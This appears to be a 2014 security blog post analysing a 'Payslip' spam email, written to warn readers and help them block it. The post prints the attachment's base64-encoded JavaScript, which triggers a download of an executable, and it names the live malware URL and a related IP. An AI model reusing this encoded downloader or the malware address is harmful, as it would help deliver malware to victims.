Sponsored by..

Wednesday 30 July 2014

"Payslip" spam

Presumably terseness works with this kind of message:

From:     Richard Mason [richardm254@gmail.com]
Date:     30 July 2014 21:23
Subject:     Payslip

Please find attached the payment slip.
Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

Clicking OK downloads an executable from www.greenexpress.ge/swift//payslip.exe which your are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..


..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded.

--14dae94734a32fac0a04ff6eee7c--
--14dae94734a32fac0e04ff6eee7e
Content-Type: text/html; charset=US-ASCII; name="swift copy-Payment-Slip-$70,000.html"
Content-Disposition: attachment;
    filename="swift copy-Payment-Slip-$70,000.html"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_hy93oezq0

DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0IiB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPiAN
CiAgICAgICBhbGVydCgnVG8gdmlldyB5b3VyIEJhbmstUGF5bWVudC1TbGlwLCBjbGljayBvayB0
byBjb250aW51ZS4nKTsNCiAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICdodHRwOi8vd3d3LmdyZWVu
ZXhwcmVzcy5nZS9zd2lmdC8vcGF5c2xpcC5leGUnOyANCiAgICA8L3NjcmlwdD4gDQoNCg0KDQo=
--14dae94734a32fac0e04ff6eee7e--
The malware itself has a VirusTotal detection rate of 31/53 which is frankly better than I'd expect. Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter:




1 comment:

PC.Tech said...

198.50.169.4: https://www.virustotal.com/en-gb/ip-address/198.50.169.4/information/
.